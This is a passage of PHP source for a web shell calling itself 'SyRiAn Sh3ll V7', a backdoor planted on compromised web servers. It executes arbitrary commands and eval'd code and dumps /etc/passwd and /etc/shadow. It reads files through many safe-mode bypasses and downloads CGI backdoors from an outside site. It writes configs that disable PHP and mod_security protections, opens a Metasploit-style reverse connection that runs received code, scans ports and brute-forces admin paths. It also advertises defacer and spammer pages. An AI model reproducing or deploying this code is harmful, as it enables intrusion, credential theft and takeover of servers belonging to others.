  856. <sy><div align=center>Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]</div></sy>
  857. <sy><div align=center>Thanx : my school : [ www.google.com ] :)</div></sy>
  858. <sy><br><div align=center>B3 Cr34T!V3 0R D!3 TRy!nG </div></sy>
  859. <br/>
  860. <center>
  861. <br/>
  862. <form method='POST'>
  863. <input type='text' name='from' value='yourEmail@example.com' size='40'/><br/>
  864. <textarea name='message' cols='25' rows='10'>Please Report Us Bugs Or suggestions .</textarea><br/>
  865. <input type='submit' value='Submit' name='sendEmail' />
  866. </form></center>
  867. </td></tr></tbody></table>";
  868. return $about;
  869. }
  870. echo CSS($shellColor);
  871. # ---------------------------------------#
  872. #             Authentication             #
  873. #----------------------------------------#
  874. if ($uselogin ==1)
  875. {
  876.         if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
  877.         {
  878.                 if($_POST[usrname]==$user && $_POST[passwrd]==$pass)
  879.                 {
  880.                         print'<script>document.cookie="user='.$_POST[usrname].';";document.cookie="pass='.md5($_POST[passwrd]).';";</script>';
  881.                 }
  882.                 else
  883.                 {
  884.                         if($_POST['usrname'])
  885.                         {
  886.                                 print'<script>alert("Go and play in the street man !!");</script>';
  887.                         }
  888.                         echo '
  889.                         <body bgcolor="black"><br><br>
  890.                         <center><font color=#990000 size=5><b>SyRi</b></font><font color=green size=5><b>An Sh</b></font><font color=gray size=5><b>3ll</b></font><br>
  891.  
  892.                         <img src="http://www.syrian-shell.com/eagle.jpg">
  893.                         </center>
  894.                         <div align="center">
  895.                         <form method="POST" onsubmit="if(this.usrname.value==\'\'){return false;}">
  896.                         <input dir="ltr" name="usrname" value="userName" type="text"  size="30" onfocus="if (this.value == \'UserName\'){this.value = \'\';}"/><br>
  897.                         <input dir="ltr" name="passwrd" value="password" type="password" size="30" onfocus="if (this.value == \'PassWord\') this.value = \'\';" /><br>
  898.                         <input type="submit" value=" Login  " name="login" />
  899.                         </form></p>';
  900.                         exit;
  901.                 }
  902.         }
  903. }
  904. # ---------------------------------------#
  905. #               Some Info                #
  906. #----------------------------------------#
  907. $dir = getcwd();
  908. $uname= @php_uname();
  909. if(strlen($dir)>1 && $dir[1]==":")
  910. $os = "Windows";
  911. else $os = "Linux";
  912. $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
  913. $server = @substr($SERVER_SOFTWARE,0,120);
  914.  
  915. echo "
  916. <body dir=\"ltr\"><table bgcolor=#cccccc cellpadding=0 cellspacing=0 width=\"100%\"><tbody><tr><td bgcolor=#000000 width=160>
  917. <p dir=ltr>&nbsp;&nbsp;</p>
  918. <div dir=ltr align=center><font size=4><b>
  919. <img border=0 src=http://www.library-ar.com/cache/eagle.jpg width=101 height=93>&nbsp;</b></font><div
  920. dir=ltr align=center><span style=height: 25px;><b>
  921. <font size=4 color=#FF0000>SyRi</font><font size=4 color=#008000>An Sh</font><font size=4 color=#999999>3ll<br>V7</font></b><span style=font-size: 20pt; color:
  922.  
  923. #990000><p></p></span></span></div></td><td
  924. bgcolor=#000000>
  925. <p dir=ltr><font  size=1>&nbsp; <b>[<a href=?id=mainPage>Main</a>]</b></span>
  926. <font color=black></span></font><b>[</span><a href=?id=scriptsHack>Forum Defacer</a>]</b></span>
  927. <b>[</span><a href=?id=spamming>Email Spammer</a>]</b></span>
  928. <b>[</span><a href=?id=about>About</a>]</b></span>
  929. <b>[</span><a href=?id=logout>Logout</a>]</b></span>
  930. <b>[</span><a href=?id=100>SuiCide</a>]</b></span>
  931. <br>
  932. <font size=1><br>
  933. &nbsp;   Safe Mode = <sy>".@SafeMode()." </sy><font size=1>
  934. &nbsp;   System = <sy>".$os."</sy>
  935. &nbsp;   Magic_Quotes = <sy>". @magicQouts()." </sy>
  936. &nbsp;   Curl = <sy>".@Curl()." </sy>
  937. &nbsp;   Register Globals = <sy>".@RegisterGlobals()." </sy>
  938. &nbsp;   Open Basedir = <sy>".@openBaseDir()." </sy>
  939. <br>
  940. &nbsp;   Gzip = <sy>".@Gzip()."</sy>
  941. &nbsp;   MySQLI = <sy>".@MysqlI()." </sy>
  942. &nbsp;   MSQL = <sy>".@MSQL()."</sy>
  943. &nbsp;   SQL Lite = <sy>".@SQlLite()."</sy>
  944. &nbsp;   Usefull Locals = <sy>".rootxpL()." </sy>
  945. <br>
  946. &nbsp;   Free Space = <sy>".@HardSize(disk_free_space('/'))." </sy>
  947. &nbsp;   Total Space = <sy>".@HardSize(disk_total_space("/"))." </sy>
  948. &nbsp;   PHP Version = <sy>".@phpversion()." </sy>
  949. &nbsp;   Zend Version = <sy>".@zend_version()." </sy>
  950. &nbsp;   MySQL Version = <sy>".@mysql_get_server_info()." </sy>
  951. <br>
  952. &nbsp;   MySQL = ".MySQL2()."
  953. &nbsp;   MsSQL = ".MsSQL()."
  954. &nbsp;   PostgreSQL = ".PostgreSQL()."
  955. &nbsp;   Oracle = ".Oracle()."
  956. &nbsp;   Server Name = <sy>".$_SERVER['HTTP_HOST']." </sy>
  957. &nbsp;   Server Admin = <sy>".$_SERVER['SERVER_ADMIN']." </sy>
  958. <br>
  959. &nbsp;   Dis_Functions = <sy>". DisableFunctions()." </sy><br>
  960. &nbsp;   Your IP = <sy>".GetRealIP()." </sy>
  961. &nbsp;   Server IP = <sy><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">".gethostbyname($_SERVER["HTTP_HOST"])."
  962.  
  963. </sy></a>
  964. [</span><a href=http://www.yougetsignal.com/tools/web-sites-on-web-server target=\"_blank\"/>Reverse IP</a>]</span>
  965. &nbsp;   Date Time = <sy>".date('Y-m-d H:i:s')." </sy><br/>
  966. &nbsp;  
  967. [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  968. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  969. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  970. <br>
  971. <br>
  972. <table bgcolor=#cccccc width=\"100%\"><tbody><tr>
  973. <td align=right width=100><p dir=ltr>
  974. <sy>&nbsp;&nbsp;Server :&nbsp;&nbsp; <br>
  975. <b>uname -a : &nbsp;
  976. <br>pwd : </span>&nbsp;<br>ID : </span>&nbsp;<br></b></sy></td><td>
  977. <p dir=ltr><font color=#cccccc size=-2><b> &nbsp;&nbsp;".$server."
  978. <br>&nbsp;&nbsp;".$uname." <sy><a href=http://www.google.com/search?q=".urlencode(@php_uname())." target=_blank>[Google]</a></sy><br>&nbsp;&nbsp;".
  979.  
  980. $dir."<br>&nbsp;&nbsp;".Exe('id')."</b>
  981. </font></td></tr></tbody>
  982. </table>
  983. &nbsp;&nbsp;[<a href='#down'>Down</a>]
  984.  [<a href='javascript:window.print()'>Print</a>]
  985. </table>";
  986.  
  987. # ---------------------------------------#
  988. #                Main Page               #
  989. #----------------------------------------#
  990. if ($_GET['id']== 'mainPage')
  991. {
  992.         echo "<form method='post'><table width=100% border=1><tr><td>
  993.         <textarea name='ExecutionArea' rows=10 cols=152 style='color=red'>";
  994.  
  995.         if(!$_POST || $_POST['login']) // Show Current Directory Contents if No Post in requesting ...
  996.         {
  997.                 @chdir($_POST['directory']);
  998.                 if($os == "Windows")
  999.                 {
  1000.                         echo Exe('dir');
  1001.                 }
  1002.                 else if($os == "Linux")
  1003.                 {
  1004.                         echo Exe('ls');
  1005.                 }
  1006.         }
  1007.         else if($_POST['submitCommands']) // Execute The Alias Command .
  1008.                 {
  1009.                         echo Exe($_POST['alias']);
  1010.                 }
  1011.         else if($_POST['Execute']) // Execute The Command From Command Line  .
  1012.                 {
  1013.                         @chdir($_POST['directory']);
  1014.                         if(empty($_POST['cmd']))
  1015.                         {
  1016.                                 if($os == "Windows")
  1017.                                 {
  1018.                                         echo Exe('dir');
  1019.                                 }
  1020.                                 else if($os == "Linux")
  1021.                                 {
  1022.                                         echo Exe('ls -lia');
  1023.                                 }
  1024.                         }
  1025.                         else
  1026.                         {
  1027.                                 echo Exe($_POST['cmd']);
  1028.                         }
  1029.                 }
  1030.                 else if($_POST['submitEval']) // Execute Eval Code .
  1031.                 {
  1032.                         $eval = @str_replace("<?php","",$_POST['php_eval']);
  1033.                         $eval = @str_replace("<?php","",$eval);
  1034.                         $eval = @str_replace("?>","",$eval);
  1035.                         $eval = @str_replace("\\","",$eval);
  1036.                         echo eval($eval);
  1037.                 }
  1038.                 # --------------------------
  1039.                 #   Hash Analyzer        
  1040.                 #---------------------------
  1041.                 else if($_POST['analyzieNow'])
  1042.                 {
  1043.                         $hash = $_POST['hashToAnalyze'];
  1044.                         $subHash = substr($hash,0,3);
  1045.                         if($subHash =='$ap' && strlen($hash) == 37)
  1046.                         {
  1047.                                 echo "The Hash : ".$hash." is : MD5(APR) Hash";
  1048.                         }
  1049.                         else if($subHash =='$1$' && strlen($hash) == 34)
  1050.                         {
  1051.                                 echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
  1052.                         }
  1053.                         else if($subHash =='$H$' && strlen($hash) == 35)
  1054.                         {
  1055.                                 echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
  1056.                         }
  1057.                         else if(strlen($hash) == 29)
  1058.                         {
  1059.                                 echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
  1060.                         }
  1061.                         else if($subHash =='$5$' && strlen($hash) == 64)
  1062.                         {
  1063.                                 echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
  1064.                         }
  1065.                         else if($subHash =='$6$' && strlen($hash) == 128)
  1066.                         {
  1067.                                 echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
  1068.                         }
  1069.                         else if(strlen($hash) == 56)
  1070.                         {
  1071.                                 echo "The Hash : ".$hash." is : SHA224 Hash";
  1072.                                 }
  1073.                         else if(strlen($hash) == 64)
  1074.                         {
  1075.                                 echo "The Hash : ".$hash." is : SHA256 Hash";
  1076.                                 }
  1077.                         else if(strlen($hash) == 96)
  1078.                         {
  1079.                                 echo "The Hash : ".$hash." is : SHA384 Hash";
  1080.                         }
  1081.                         else if(strlen($hash) == 128)
  1082.                         {
  1083.                                 echo "The Hash : ".$hash." is : SHA512 Hash";
  1084.                         }
  1085.                         else if(strlen($hash) == 40)
  1086.                         {
  1087.                                 echo "The Hash : ".$hash." is : MySQL v5.x Hash";
  1088.                         }
  1089.                         else if(strlen($hash) == 16)
  1090.                         {
  1091.                                 echo "The Hash : ".$hash." is : MySQL Hash";
  1092.                         }
  1093.                         else if(strlen($hash) == 13)
  1094.                         {
  1095.                                 echo "The Hash : ".$hash." is : DES(Unix) Hash";
  1096.                         }
  1097.                         else if(strlen($hash) == 32)
  1098.                         {
  1099.                                 echo "The Hash : ".$hash." is : MD5 Hash";
  1100.                         }
  1101.                         else if(strlen($hash) == 4)
  1102.                         {
  1103.                                 echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
  1104.                         else
  1105.                         {
  1106.                                 echo "Error : Can't Detect Hash Type";
  1107.                         }
  1108.                 }
  1109.                 # --------------------------
  1110.                 #  Show Users    
  1111.                 #---------------------------
  1112.                 else if($_POST['showUsers'])
  1113.                 {
  1114.                         function showUsers()
  1115.                         {
  1116.  
  1117.                                 if($rows = Exe('cat /etc/passwd'))
  1118.                                 {
  1119.                                         echo $rows;
  1120.                                 }
  1121.                                 elseif($rows= Exe('cat /etc/domainalias'))
  1122.                                 {
  1123.                                         echo $rows;
  1124.                                 }
  1125.                                 elseif($rows= Exe('cat /etc/shadow'))
  1126.                                 {
  1127.                                         echo $rows;
  1128.                                 }
  1129.                                 elseif($rows= Exe('cat /var/mail'))
  1130.                                 {
  1131.                                         echo $rows;
  1132.                                 }
  1133.                                 elseif($rows= Exe('cat /etc/valiases'))
  1134.                                 {
  1135.                                         echo $rows;
  1136.                                 }
  1137.                                 else { echo "[-] Can't Show Users :( ... Sorry ";}
  1138.                         }
  1139.                         showUsers();
  1140.                 }
  1141.                 # --------------------------
  1142.                 #   Generate perl      
  1143.                 #---------------------------
  1144.                 else if($_POST['generatePel'])
  1145.                 {
  1146.                         @chdir($_POST["cgiperlPath"]);
  1147.                         @mkdir("cgi", 0755);
  1148.                         @chdir("cgi");
  1149.                         Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip');
  1150.                         Exe('unzip cgiPerl.sy3.zip');
  1151.                         @unlink('cgiPerl.sy3.zip');
  1152.                         @chmod("cgiPerl.sy3",0755);
  1153.                         @chmod("compiler",0777);
  1154.                         $cgi_h = fopen('.htaccess','w+');
  1155.                         @fwrite($cgi_h,'AddHandler cgi-script .sy3');
  1156.                         echo '
  1157. cgi.sy3 & .htaccess Has Been Created in [ cgi ]  Directory
  1158. Password Is : sy34' ;
  1159.                 }
  1160.                 # --------------------------
  1161.                 #   Generate Server  
  1162.                 #---------------------------
  1163.                 else if($_POST['generateSER'])
  1164.                 {
  1165.                         @chdir($_POST['ShourtCutPath']);
  1166.                         @mkdir("allserver", 0755);
  1167.                         @chdir("allserver");
  1168.                         Exe("ln -s / allserver");
  1169.                         GenerateFile(".htaccess","
  1170.                         Options Indexes FollowSymLinks
  1171.                         DirectoryIndex ssssss.htm
  1172.                         AddType txt .php
  1173.                         AddHandler txt .php");
  1174.                         echo 'Now Go to allserver folder '.$_POST['ShourtCutPath'].'' ;
  1175.                 }
  1176.                 # --------------------------
  1177.                 #   Change Mode
  1178.                 #---------------------------
  1179.                 else if($_POST['changePermission'])
  1180.                 {
  1181.                         $ch_ok = @chmod($_POST['fileName'],$_POST['per']);
  1182.                         if($ch_ok)
  1183.                         echo "Permission Changed Successfully ! " ;
  1184.                         else echo "Changing Is Not Allowed Or The File is not Exist !";
  1185.                 }
  1186.                 # --------------------------
  1187.                 #   Generate Users
  1188.                 #---------------------------
  1189.                 else if($_POST['GenerateUsers'])
  1190.                 {
  1191.                         @chdir($_POST['usersPath']);
  1192.                         @mkdir("users", 0755);
  1193.                         @chdir('users');
  1194.                         Exe('wget http://www.syrian-shell.com/usersAndDomains/users.rar');
  1195.                         Exe('mv users.rar users.sy3');
  1196.                         @chmod('users.sy3',0755 );
  1197.                         $user_h = fopen('.htaccess','w+');
  1198.                         fwrite($user_h,'AddHandler cgi-script .sy3');
  1199.                         echo "users.sy3 & .htaccess Has Been Created in [ users ]  Directory" ;
  1200.                 }
  1201.                 # --------------------------
  1202.                 #   Forbidden
  1203.                 #---------------------------
  1204.                 else if($_POST['generateForbidden'])
  1205.                 {
  1206.                         @chdir($_POST['forbiddenPath']);
  1207.                         @mkdir('forbidden');
  1208.                         @chdir('forbidden');
  1209.                         $htaccess = fopen('.htaccess','w+');
  1210.                         if($_POST['403'] == 'DirectoryIndex')
  1211.                         {
  1212.                                 fwrite($htaccess,"DirectoryIndex in.txt");
  1213.                         }
  1214.                         elseif($_POST['403'] == 'HeaderName')
  1215.                         {
  1216.                                 fwrite($htaccess,"HeaderName in.txt");
  1217.                         }
  1218.                         elseif($_POST['403'] == 'TXT')
  1219.                         {
  1220.                                 fwrite($htaccess,"
  1221.                                 Options Indexes FollowSymLinks
  1222.                                 addType txt .php
  1223.                                 AddHandler txt .php");
  1224.                         }
  1225.                         elseif($_POST['403'] == '404')
  1226.                         {
  1227.                                 fwrite($htaccess,"
  1228.                                 ErrorDocument 404 /404.html
  1229.                                 404.html = Symlinked in.txt  ");
  1230.                         }
  1231.                         elseif($_POST['403'] == 'ReadmeName')
  1232.                         {
  1233.                                 fwrite($htaccess,"ReadmeName in.txt");
  1234.                         }
  1235.                         elseif($_POST['403'] == 'footerName')
  1236.                         {
  1237.                                 fwrite($htaccess,"footerName in.txt");
  1238.                         }
  1239.                         echo "
  1240. Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
  1241. EX : ln -s /home/user/public_html/config.php in.txt";
  1242.                 }
  1243.                 # --------------------------
  1244.                 #   Upload Files
  1245.                 #---------------------------
  1246.                 else if($_POST['UploadNow'])
  1247.                 {
  1248.                         $nbr_uploaded =0;
  1249.                         $files_uploded = array();
  1250.                         $path= '';
  1251.                         $target_path= $path . basename($_FILES['uploadfile']['name'][$i]);
  1252.                         for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++)
  1253.                         {
  1254.                                 if($_FILES['uploadfile']['name'][$i] != '')
  1255.                                 {
  1256.                                         move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
  1257.                                         $files_uploded[] = $_FILES['uploadfile']['name'][$i];
  1258.                                         $nbr_uploaded++;
  1259.                                         echo "The File  ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !
  1260. ";
  1261.                                 }
  1262.                                 else "The File  ".basename($_FILES['uploadfile']['name'][$i])."  Can't Be Upload :( !";
  1263.                         }
  1264.                 }
  1265.                 # --------------------------
  1266.                 #   no Security
  1267.                 #---------------------------
  1268.                 else if($_POST['phpiniGenerate'])
  1269.                 {
  1270.                         GenerateFile("php.ini","
  1271.                         safe_mode = Off
  1272.                         disable_functions = NONE
  1273.                         safe_mode_gid = OFF
  1274.                         open_basedir = OFF");
  1275.                         echo "php.ini Has Been Generated Successfully";
  1276.                 }
  1277.                 else if($_POST['htaccessGenerate'])
  1278.                 {
  1279.                         GenerateFile(".htaccess","
  1280.                         <IfModule mod_security.c>
  1281.                         SecFilterEngine Off
  1282.                         SecFilterScanPOST Off
  1283.                         SecFilterCheckURLEncoding Off
  1284.                         SecFilterCheckCookieFormat Off
  1285.                         SecFilterCheckUnicodeEncoding Off
  1286.                         SecFilterNormalizeCookies Off
  1287.                         </IfModule>
  1288.                         SetEnv PHPRC ".getcwd()."php.ini
  1289.                         suPHP_ConfigPath ".getcwd()."php.ini
  1290.                         ");
  1291.                         echo ".htaccess Has Been Generated Successfully ";
  1292.                 }
  1293.                 else if($_POST['iniphpGenerate'])
  1294.                 {
  1295.                         GenerateFile("ini.php","
  1296.                         ini_restore(\"safe_mode\");
  1297.                         ini_restore(\"open_basedir\");
  1298.                         ");
  1299.                         echo "ini.php Has Been Generated Successfully";
  1300.                 }
  1301.                 # --------------------------
  1302.                 #  Reading Files
  1303.                 #---------------------------
  1304.                 else if($_POST['read'] || $_POST['show'])
  1305.                 {
  1306.                         $file = $_POST['file'];
  1307.                         $file = str_replace('\\\\','\\',$file);
  1308.                        
  1309.                                 if($_POST['read'])
  1310.                                 {
  1311.                                         $openMyFile = fopen($file,'r');
  1312.                                         if(function_exists('fread'))
  1313.                                         {
  1314.                                                 echo fread($openMyFile,100000);
  1315.                                         }
  1316.                                         elseif(function_exists('fgets'))
  1317.                                         {
  1318.                                                 echo fgets($openMyFile);
  1319.                                         }
  1320.                                         elseif(function_exists('readfile'))
  1321.                                         {
  1322.                                                 echo readfile($openMyFile);
  1323.                                         }
  1324.                                         elseif(function_exists('file_get_contents'))
  1325.                                         {
  1326.                                                 $readMyFile = @file_get_contents($file, NULL, NULL, 0, 1000000);
  1327.                                                 var_dump($readMyFile);
  1328.                                         }
  1329.                                         elseif(function_exists('file'))
  1330.                                         {
  1331.                                                 $readMyFile = file($myFile);
  1332.                                                 foreach ($readMyFile as $line_num => $readMyFileLine)
  1333.                                                 {
  1334.                                                         echo "Line #$line_num : " . $readMyFileLine . "
  1335.                                                         ";
  1336.                                                 }
  1337.                                         }
  1338.                                         elseif(Exe("'cat ".$file."'"))
  1339.                                         {
  1340.                                                 echo Exe("'cat ".$file."'");   
  1341.                                         }
  1342.                                 elseif(function_exists('readfile'))
  1343.                                 {
  1344.                                         readfile($file);
  1345.                                 }
  1346.                                 elseif(function_exists('include'))
  1347.                                 {
  1348.                                         include($file);
  1349.                                 }
  1350.                                 elseif(function_exists('copy'))
  1351.                                 {
  1352.                                         $tmp=tempnam('','cx');
  1353.                                         copy('compress.zlib://'.$file,$tmp);
  1354.                                         $fh=fopen($tmp,'r');
  1355.                                         $data=fread($fh,filesize($tmp));
  1356.                                         fclose($fh);
  1357.                                         echo $data;
  1358.                                 }
  1359.                                 elseif(function_exists('mb_send_mail'))
  1360.                                 {
  1361.                                         if(file_exists('/tmp/mb_send_mail'))
  1362.                                         {
  1363.                                                 unlink('/tmp/mb_send_mail');
  1364.                                         }
  1365.                                         @mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
  1366.                                         @readfile('/tmp/mb_send_mail');
  1367.                                 }
  1368.                                 else if(function_exists('curl_init'))
  1369.                                 {
  1370.                                         $fh=curl_init('file://'.$file.'');
  1371.                                         $tmp=curl_exec($fh);
  1372.                                         echo $tmp;
  1373.                                         if(strstr($file,DIRECTORY_SEPARATOR))
  1374.                                         $ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
  1375.                                         else $ch=curl_init('file://'.$file."\x00".__FILE__);
  1376.                                         var_dump(curl_exec($ch));
  1377.                                 }
  1378.                                 else if(is_writable('.'))
  1379.                                 {
  1380.                                         file_put_contents('php.ini','safe_mode = Off');
  1381.                                         readfile($file);
  1382.                                         unlink('php.ini');
  1383.                                 }
  1384.                                 else if(is_object($ws=new COM('WScript.Shell')))
  1385.                                 {
  1386.                                         echo $exec=comshelL("type \"$file\"",$ws);
  1387.                                 }
  1388.                                 else if(checkfunctioN('win_shell_execute'))
  1389.                                 {
  1390.                                         echo winshelL("type \"$file\"");
  1391.                                 }
  1392.                                 else if(checkfunctioN('win32_create_service'))
  1393.                                 {
  1394.                                         echo srvshelL("type \"$file\"");
  1395.                                 }
  1396.                                 else if(function_exists('imap_open'))
  1397.                                 {
  1398.                                         $str=imap_open('/etc/passwd','','');
  1399.                                         $list=imap_list($str,$file,'*');
  1400.                                         for($i=0;$i<count($list);$i++)
  1401.                                         {
  1402.                                                 echo $list[$i]."\n";
  1403.                                         }
  1404.                                         imap_close($str);
  1405.                                         $str=imap_open($file,'','');
  1406.                                         $tmp=imap_body($str,1);
  1407.                                         echo $tmp;
  1408.                                         imap_close($str);
  1409.                                 }
  1410.                                 elseif($file == '/etc/passwd')
  1411.                                 {
  1412.                                         for($uid=0;$uid<99999;$uid++)
  1413.                                         {
  1414.                                                 $h=posix_getpwuid($uid);
  1415.                                                 if(!empty($h))
  1416.                                                 foreach($h as $v)
  1417.                                                 echo "$v:";
  1418.                                                 echo "\r\n";
  1419.                                         }
  1420.                                 }
  1421.                                 fclose($openMyFile);
  1422.                         }
  1423.                         elseif($_POST['show'])
  1424.                         {
  1425.                                 $con=glob("$file*");
  1426.                                 foreach ($con as $v)
  1427.                                 {
  1428.                                         echo "$v\n";
  1429.                                 }
  1430.                                 if(function_exists('imap_open'))
  1431.                                 {
  1432.                                         $str=imap_open('/etc/passwd','','');
  1433.                                         $s=explode("|",$file);
  1434.                                         if(count($s)>1)
  1435.                                         {
  1436.                                                 $list=imap_list($str,trim($s[0]),trim($s[1]));
  1437.                                         }
  1438.                                         else
  1439.                                         {
  1440.                                                 $list=imap_list($str,trim($str[0]),'*');
  1441.                                         }
  1442.                                         for($i=0;$i<count($list);$i++)
  1443.                                         {
  1444.                                                 imap_close($str);
  1445.                                         }
  1446.                                 }
  1447.                                 else if(is_object($ws=new COM('WScript.Shell')))
  1448.                                 {
  1449.                                         $exec=comshelL("dir \"$file\"",$ws);
  1450.                                         $exec=str_replace("\t",'',$exec);
  1451.                                         echo $exec;
  1452.                                 }
  1453.                                 else if(checkfunctioN('win_shell_execute'))
  1454.                                 {
  1455.                                         echo winshelL("dir \"$file\"");
  1456.                                 }
  1457.                                 else if(checkfunctioN('win32_create_service'))
  1458.                                 {
  1459.                                         echo srvshelL("dir \"$file\"");
  1460.                                 }
  1461.                         }
  1462.                        
  1463.                 }
  1464.                 # --------------------------
  1465.                 #   Encryption
  1466.                 #---------------------------
  1467.                 elseif($_POST['encryptNow'])
  1468.                 {
  1469.                         if(!empty($_POST['ENCRYPTION']))
  1470.                         {
  1471.                                 $md5 = $_POST['ENCRYPTION'];
  1472.                                 echo "
  1473. MD5                     : ".md5($md5)."
  1474. Base64 Encode           : ".base64_encode($md5)."
  1475. Base64 Decode           : ".base64_decode($md5)."
  1476. Crypt                   : ".crypt($md5)."
  1477. SHA1                    : ".sha1($md5)."
  1478. MD4                     : ".hash("md4",$md5)."
  1479. SHA256                  : ".hash("sha256",$md5)."
  1480. URL Encoding            : ".urlencode($md5)."
  1481. URL Decoding            : ".str_hex($md5)."
  1482. CRC32                   : ".crc32($md5)."
  1483. Length                  : ".strlen($md5)."";
  1484.                         }
  1485.                         else
  1486.                         {
  1487.                                 echo "Please Put At Least One Char !";
  1488.                         }
  1489.                 }
  1490.                 # --------------------------
  1491.                 #   Metasploit RC
  1492.                 #---------------------------
  1493.                 else if($_POST['metaConnect'])
  1494.                 {
  1495.                         $ip = $_POST['ip'];
  1496.                         $port = $_POST['port'];
  1497.                         if ($ip == "" && $port == "")
  1498.                         {
  1499.                                 echo "Please fill IP Adress & The listen Port";
  1500.                         }
  1501.                         else
  1502.                         {
  1503.                                 $ipaddr = $ip;
  1504.                                 $port = $port;
  1505.                                 if (FALSE !== strpos($ipaddr, ":"))
  1506.                                 {
  1507.                                         $ipaddr = "[". $ipaddr ."]";
  1508.                                 }
  1509.                                 if (is_callable('stream_socket_client'))
  1510.                                 {
  1511.                                         $msgsock = @stream_socket_client("tcp://{$ipaddr}:{$port}");
  1512.                                         if (!$msgsock)
  1513.                                         {
  1514.                                                 die();
  1515.                                         }
  1516.                                         $msgsock_type = 'stream';
  1517.                                 }
  1518.                                 elseif (is_callable('fsockopen'))
  1519.                                 {
  1520.                                         $msgsock = fsockopen($ipaddr,$port);
  1521.                                         if (!$msgsock)
  1522.                                         {
  1523.                                                 die();
  1524.                                         }
  1525.                                         $msgsock_type = 'stream';
  1526.                                 }
  1527.                                 elseif (is_callable('socket_create'))
  1528.                                 {
  1529.                                         $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  1530.                                         $res = socket_connect($msgsock, $ipaddr, $port);
  1531.                                         if (!$res)
  1532.                                         {
  1533.                                                 die();
  1534.                                         }
  1535.                                         $msgsock_type = 'socket';
  1536.                                 }
  1537.                                 else
  1538.                                 {
  1539.                                         die();
  1540.                                 }
  1541.                                 switch ($msgsock_type)
  1542.                                 {
  1543.                                         case 'stream': $len = fread($msgsock, 4); break;
  1544.                                         case 'socket': $len = socket_read($msgsock, 4); break;
  1545.                                 }
  1546.                                 if (!$len)
  1547.                                 {
  1548.                                         die();
  1549.                                 }
  1550.                                 $a = unpack("Nlen", $len);
  1551.                                 $len = $a['len'];
  1552.                                 $buffer = '';
  1553.                                 while (strlen($buffer) < $len)
  1554.                                 {
  1555.                                         switch ($msgsock_type)
  1556.                                         {
  1557.                                                 case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
  1558.                                                 break;
  1559.                                                 case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
  1560.                                                 break;
  1561.                                         }
  1562.                                 }
  1563.                                 eval($buffer);
  1564.                                 echo "[*] Connection Terminated";
  1565.                                 die();
  1566.                         }
  1567.                 }
  1568.                 # --------------------------
  1569.                 #  Scan Ports
  1570.                 #---------------------------
  1571.                 else if($_POST['submitDomainToScanPort'])
  1572.                 {
  1573.                         $domainToScan = $_POST['domainToScanPort'];
  1574.                         if(!$domainToScan)
  1575.                         {
  1576.                                 echo "[-] Enter IP Address Or Domain To Scan";
  1577.                         }
  1578.                         else
  1579.                         {
  1580.                                 for($i=0;$i<1024;$i++)
  1581.                                 {
  1582.                                         $fp = @fsockopen($domainToScan,$i,$errno,$errstr,10);
  1583.                                         if($fp)
  1584.                                         {
  1585.                                                 echo "[+] port " . $i . " open on " . $domainToScan . "
  1586. ";
  1587.                                         }
  1588.                                         else
  1589.                                         {
  1590.                                                 echo "[+] port " . $i . " closed on " . $domainToScan . "
  1591. ";
  1592.                                         }
  1593.                                         flush();
  1594.                                 }
  1595.                                 fclose($fp);
  1596.                         }
  1597.                 }
  1598.                        
  1599.                         if (isset($_POST["submit_lol"]))
  1600.                         {
  1601.                                 set_time_limit(0);
  1602.                                 $url = $_POST['hash_lol'];
  1603.                                 echo "Testing ".$url."\n";
  1604.                                 $extention = $_POST['extention'];
  1605.                                 $adminlocales = array(
  1606. "admin/",
  1607. "wp-admin/",
  1608. "administration/",
  1609. "administrator/",
  1610. "moderator/",
  1611. "webadmin/",
  1612. "adminarea/",
  1613. "bb-admin/",
  1614. "adminLogin/",
  1615. "admin_area/",
  1616. "panel-administracion/",
  1617. "instadmin/",
  1618. "memberadmin/",
  1619. "administratorlogin/",
  1620. "adm/",
  1621. "siteadmin/login".$extention."",
  1622. "admin/account".$extention."",
  1623. "admin/index".$extention."",
  1624. "admin/login".$extention."",
  1625. "admin/admin".$extention."",
  1626. "admin_area/login".$extention."",
  1627. "admin_area/index".$extention."",
  1628. "admincp/index".$extention."",
  1629. "adminpanel".$extention."",
  1630. "webadmin".$extention."",
  1631. "webadmin/index".$extention."",
  1632. "webadmin/login".$extention."",
  1633. "admin/admin_login".$extention."",
  1634. "admin_login".$extention."",
  1635. "panel-administracion/login".$extention."",
  1636. "admin_area/admin".$extention."",
  1637. "bb-admin/index".$extention."",
  1638. "bb-admin/login".$extention."",
  1639. "bb-admin/admin".$extention."",
  1640. "admin/home".$extention."",
  1641. "pages/admin/admin-login".$extention."",
  1642. "admin/admin-login".$extention."",
  1643. "admin-login".$extention."",
  1644. "admin/adminLogin".$extention."",
  1645. "home".$extention."",
  1646. "adminarea/index".$extention."",
  1647. "admin/controlpanel".$extention."",
  1648. "admin".$extention."",
  1649. "admin/cp".$extention."",
  1650. "cp".$extention."",
  1651. "adminpanel.php",
